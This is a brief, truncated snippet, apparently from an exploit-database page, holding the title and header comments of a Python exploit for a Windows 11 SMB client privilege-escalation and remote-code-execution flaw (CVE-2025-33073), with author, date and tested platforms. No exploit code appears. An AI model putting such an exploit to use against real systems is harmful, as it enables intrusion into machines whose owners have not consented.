
Windows 11 SMB Client – Privilege Escalation & Remote Code Execution (RCE)
#!/usr/bin/env python3 # Exploit Title: Windows 11 SMB Client – Privilege Escalation & Remote Code Execution (RCE) # Author: Mohammed Idrees Banyamer # Instagram: @banyamer_security # GitHub: https://github.com/mbanyamer # Date: 2025-06-13 # Tested on: Windows 11 version 22H2, Windows Server 2022, Kali Linux 2024.2 # CVE: CVE-2025-33073 # Type: Remote # Platform: Microsoft Windows (including…